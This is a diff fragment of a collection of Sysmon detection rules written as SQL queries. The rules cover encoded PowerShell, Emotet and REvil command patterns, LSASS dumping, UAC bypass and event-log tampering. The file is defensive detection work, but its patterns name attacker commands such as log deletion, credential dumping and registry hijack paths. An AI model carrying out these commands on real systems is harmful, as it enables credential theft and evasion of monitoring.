Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1547.001" + "attack.t1546" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" - }, - { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1119" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image 